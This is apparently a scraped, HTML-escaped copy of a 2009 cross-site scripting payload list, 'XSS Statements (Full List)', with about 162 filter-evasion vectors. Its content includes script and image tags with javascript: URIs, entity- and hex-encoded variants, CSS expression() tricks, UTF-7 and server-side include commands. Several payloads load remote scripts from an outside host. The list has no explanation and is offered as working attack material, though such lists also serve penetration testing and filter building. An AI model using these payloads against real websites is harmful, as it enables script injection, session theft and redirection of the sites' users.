'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
